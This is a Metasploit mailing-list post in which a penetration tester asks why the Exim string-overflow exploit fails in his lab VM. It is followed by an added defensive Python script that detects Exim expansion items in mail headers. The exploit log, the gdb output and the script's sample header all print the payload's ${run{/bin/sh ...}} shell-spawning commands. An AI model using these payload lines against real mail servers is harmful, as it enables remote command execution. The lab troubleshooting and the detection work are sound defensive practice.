Metasploit mailing list archives

exim4_string_overflow


From: Paul Johnston <paul.johnston () pentest co uk>
Date: Thu, 03 Feb 2011 11:30:03 +0000

Hi,

I'm having real trouble setting up a demo environment to try the
exim4_string_overflow exploit against.

The target OS is Oracle Enterprise Linux 5.4, running on VirtualBox.
I've tried both the bundled Exim RPM and version 4.69 compiled from
source. I've disabled exec-shield and address randomization:

[root@localhost ~]# cat /proc/sys/kernel/exec-shield
0
[root@localhost ~]# cat /proc/sys/kernel/randomize_va_space
0

When I run the exploit, the following happens (if I'm *NOT* tracking the
process with gdb):

msf exploit(exim4_string_format) > exploit

[*] Started reverse double handler
[*] Connecting to 192.168.3.4:25 ...
[*] Server: 220 localhost ESMTP Exim 4.69 Wed, 02 Feb 2011 19:17:47 +0000
[*] EHLO: 250-localhost Hello ZtTr2Wp2.com [192.168.3.2]
[*] EHLO: 250-SIZE 52428800
[*] EHLO: 250-PIPELINING
[*] EHLO: 250 HELP
[*] Determined our hostname is ZtTr2Wp2.com and IP address is 192.168.3.2
[*] MAIL: 250 OK
[*] RCPT: 250 Accepted
[*] DATA: 354 Enter message, ending with "." on a line by itself
[*] Constructing initial headers ...
[*] Constructing HeaderX ...
[*] Constructing body ...
[*] Sending 50 megabytes of data...
[*] Ending first message.
[-] Exploit exception: end of file reached
[*] Exploit completed, but no session was created.

If I do track with gdb, the flow is slightly different but the exploit
still fails. gdb shows this:

(gdb) c
Continuing.

(metasploit continues to send 50mb message)

Error while mapping shared library sections:
'exec /bin/sh -i <&7 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&8
>&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&9 >&0 2>&0'}}
${run{/bin/sh -c 'exec /bin/sh -i <&10 >&0 2>&0'}} ${run{/bin/sh -c
'exec /bin/sh -i <&11 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&12
>&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}
${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}} ${run{/bin/sh -c 'exec
/bin/sh -i <&5 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&6 >&0
2>&0'}} ${run{/bin/sh -c 'exec /b: No such file or directory.
(no debugging symbols found)

Program received signal SIGABRT, Aborted.
0x007d2402 in __kernel_vsyscall ()

Any ideas? I'm totally stuck! Thanks,

Paul

-- 
Pentest - When a tick in the box is not enough

Paul Johnston - IT Security Consultant / Tiger SST
Pentest Limited - ISO 9001 (cert 16055) / ISO 27001 (cert 558982)

Office: +44 (0) 161 233 0100
Mobile: +44 (0) 7817 219 072

Email policy: http://www.pentest.co.uk/legal.shtml#emailpolicy
Registered Number: 4217114 England & Wales
Registered Office: 26a The Downs, Altrincham, Cheshire, WA14 2PU, UK
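An added example, not part of Paul's post or of the Metasploit module: the gdb output above shows the message carries an Exim string-expansion item (`${run{...}}`) inside a header, which is the artefact a mail administrator can look for in logged or quarantined headers. The detector below scans header lines for Exim expansion items that execute commands or read files; the sample headers and the `HeaderX` name are constructed for the example.

```python
import re

# Constructed sample SMTP header lines (not taken from the original post).
SAMPLE_HEADERS = [
    "From: alice@example.com",
    "Subject: quarterly report",
    "HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}",
    "X-Note: price is ${amount}",  # braces alone are not an expansion item
]

# Exim expansion items that run programs or read local files. A legitimate
# header never needs to contain these; their presence is the signal.
EXPANSION_RE = re.compile(
    r"\$\{(run|readfile|readsocket|perl|dlfunc)\{", re.IGNORECASE
)


def find_expansion_headers(lines):
    """Return (line_no, item, header_name) for every header line that
    contains an Exim expansion item which executes or reads something."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = EXPANSION_RE.search(line)
        if m:
            header_name = line.split(":", 1)[0].strip()
            hits.append((n, m.group(1).lower(), header_name))
    return hits


if __name__ == "__main__":
    for n, item, header in find_expansion_headers(SAMPLE_HEADERS):
        print(f"line {n}: header {header!r} contains ${{{item}{{...}}}}")
```

The same function can be pointed at a message spool file or an Exim log excerpt that echoes rejected headers; a hit is worth correlating with unusually large inbound messages like the 50 MB one the exploit output describes.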